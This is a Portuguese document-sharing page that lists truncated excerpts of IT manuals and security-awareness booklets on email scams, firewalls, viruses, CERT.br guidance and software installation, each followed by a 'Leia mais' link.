CARTILHA DE INFORMÁTICA SEÇÃO TÉCNICA DE INFORMÁTICA PUSP-P Nº 002 - SETEMBRO/2014 TEMA: GOLPES POR EMAIL "NA DÚVIDA NÃO CLIQUE" RELEMBRANDO: Na cartilha nº 001 lançada em Julho de 2014 escrevemos dicas
Leia maisCartilha de Segurança para Internet
Comitê Gestor da Internet no Brasil Cartilha de Segurança para Internet Parte VII: Incidentes de Segurança e Uso Abusivo da Rede Versão 3.1 2006 CERT.br Centro de Estudos, Resposta e Tratamento de Incidentes
Leia maisWebMail --------------------------------------------------------------------------------------------------------------- Manual do cliente
WebMail --------------------------------------------------------------------------------------------------------------- Manual do cliente www.plugin.com.br 1 ÍNDICE Prefácio...3 Sobre Este Manual... 3
Leia maisSolução de acessibilidade. Guia do administrador
Solução de acessibilidade Guia do administrador Julho de 2014 www.lexmark.com Conteúdo 2 Conteúdo Visão geral...3 Configurando o aplicativo...4 Configurando o acesso do usuário...4 Desativando funções
Leia maisConfigurações Básicas para o e-sus Hospitalar
Configurações Básicas para o e-sus Hospitalar Guia do Usuário - 15/12/2014 Sumário 1 Introdução... 2 2 Objetivo... 3 3 Configuração e Execução dos Controles ActiveX... 4 3.1 ActiveX... 4 3.2 Install.bat...
Leia maisSegurança da Internet no Brasil e Atuação do CERT.br
Segurança da Internet no Brasil e Atuação do CERT.br Aritana Pinheiro Falconi falconi@cert.br Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no Brasil Núcleo de Informação e Coordenação
Leia maisFirewall. Qual a utilidade em instalar um firewall pessoal?
Firewall Significado: Firewall em português é o mesmo que parede cortafogo, um tipo de parede, utilizada principalmente em prédios, que contém o fogo em casos de incêndio. O firewall da informática faz
Leia maisPROCEDIMENTOS PARA UTILIZAÇÃO DE NOVA VERSÃO DO JAVA
1 PROCEDIMENTOS PARA UTILIZAÇÃO DE NOVA VERSÃO DO JAVA A partir da atualização da versão do programa JAVA ( 7 Update 51) que ocorreu nas máquinas dos usuários em Janeiro/2014, algumas alterações de segurança
Leia maisPolítica de privacidade do Norton Community Watch
Política de privacidade do Norton Community Watch Data de início: 5 de agosto de 1999 Última atualização: 16 de abril de 2010 O que é o Norton Community Watch? O Norton Community Watch permite que os usuários
Leia maisRenovação Online de certificados digitais A3 (Voucher)
Renovação Online de certificados digitais A3 (Voucher) Todos os direitos reservados. Imprensa Oficial do Estado S.A. 2012 página 1 de 19 Requisitos para a Renovação Certificados A3 Em Cartão/Token (Navegador
Leia maisManual - Gemelo Backup Online WEB
Manual - Gemelo Backup Online WEB É um disco virtual que permite acessar seus dados de qualquer lugar através da Internet. Acesso A Gemelo Storage Solutions e enviará um e-mail confirmando que você é usuário
Leia maisSISTEMAS OPERACIONAIS LIVRES. Professor Carlos Muniz
SISTEMAS OPERACIONAIS LIVRES Agendar uma tarefa Você deve estar com logon de administrador para executar essas etapas. Se não tiver efetuado logon como administrador, você só poderá alterar as configurações
Leia maisSISNOR WEB SISTEMA INTEGRADO DE APOIO À FISCALIZAÇÃO DOS SERVIÇOS NOTARIAIS E DE REGISTRO CERTIFICADO DIGITAL
SISNOR WEB SISTEMA INTEGRADO DE APOIO À FISCALIZAÇÃO DOS SERVIÇOS NOTARIAIS E DE REGISTRO CERTIFICADO DIGITAL Manual de Usuário Versão 1.0 1 Histórico de Revisões: Versão 1.0 06/05/2015: Raphael Pena Cavalcanti
Leia mais"Manual de Acesso ao Moodle - Discente" 2014
"Manual de Acesso ao Moodle - Discente" 2014 Para acessar a plataforma, acesse: http://www.fem.com.br/moodle. A página inicial da plataforma é a que segue abaixo: Para fazer o login, clique no link Acesso
Leia maisManual de Instalação Mozilla Thunderbird no DATASUS - RJ
Manual de Instalação Mozilla Thunderbird no DATASUS - RJ Conteúdo Sobre Este Documento......2 Conhecimentos Desejados...2 Organização deste Documento...2 Sobre o Mozilla Thunderbird...2 1.Pré-requisitos
Leia maisVia Prática Firewall Box Gateway O acesso à Internet
FIREWALL BOX Via Prática Firewall Box Gateway O acesso à Internet Via Prática Firewall Box Gateway pode tornar sua rede mais confiável, otimizar sua largura de banda e ajudar você a controlar o que está
Leia maisEvolução dos Problemas de Segurança e Formas de Proteção
Evolução dos Problemas de Segurança e Formas de Proteção Núcleo de Informação e Coordenação do Ponto.br Nic.br http://www.nic.br/ Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no
Leia maisFirewall. Professor: João Paulo de Brito Gonçalves Disciplina: Serviços de Redes. Campus Cachoeiro Curso Técnico em Informática
Firewall Professor: João Paulo de Brito Gonçalves Disciplina: Serviços de Redes Campus Cachoeiro Curso Técnico em Informática Firewall (definições) Por que do nome firewall? Antigamente, quando as casas
Leia maisProcedimentos para Instalação do SISLOC
Procedimentos para Instalação do SISLOC Sumário 1. Informações Gerais...3 2. Instalação do SISLOC...3 Passo a passo...3 3. Instalação da Base de Dados SISLOC... 11 Passo a passo... 11 4. Instalação de
Leia mais13/3/2012. Prof. Flávio Ferry DIE UFPI - 2012
Prof. Flávio Ferry DIE UFPI - 2012 Pequeno programa criado com a intenção de provocar danos a dados ou lentidão de processamento. Razão do nome = Estes programas são feitos para serem auto instaláveis
Leia maisSegurança na internet
Segurança na internet Perigos da internet Cyberbullying Uso da internet para praticar ofensas e humilhações a alguém de forma constante Discriminação Quando há publicação de mensagem ou imagem preconceituosas
Leia maisServiços de TIC Soluções e demandas
Serviços de TIC Soluções e demandas Superintendência de Governança Eletrônica e de Tecnologia da Informação e Comunicação (SeTIC/UFSC) 16/07/2015 CSS/SeTIC 1 Agenda SeTIC Apresentação dos serviços, por
Leia maisMicrosoft Internet Explorer. Browser/navegador/paginador
Microsoft Internet Explorer Browser/navegador/paginador Browser (Navegador) É um programa que habilita seus usuários a interagir com documentos HTML hospedados em um servidor web. São programas para navegar.
Leia maisEste artigo abaixo foi produzido originalmente para a Network Core Wiki. Reproduzo-a aqui na íntegra. Publicado originalmente em 07/12/2007.
Vírus no Linux? Este artigo abaixo foi produzido originalmente para a Network Core Wiki. Reproduzo-a aqui na íntegra. Publicado originalmente em 07/12/2007. Interface de uma distribuição Linux Uma das
Leia maisNFe Nota Fiscal Eletronica
1 NFe Nota Fiscal Eletronica Introdução O NFe Tron, apesar de ser um sistema complexo, possui um método simples de instalação, configurando todos os elementos necessários para o funcionamento básico do
Leia maisNettion Security & Net View. Mais que um software, gestão em Internet.
Nettion Security & Net View Mais que um software, gestão em Internet. Net View & Nettion Security Mais que um software, gestão em Internet. A Net View e a Nettion Security Software se uniram para suprir
Leia mais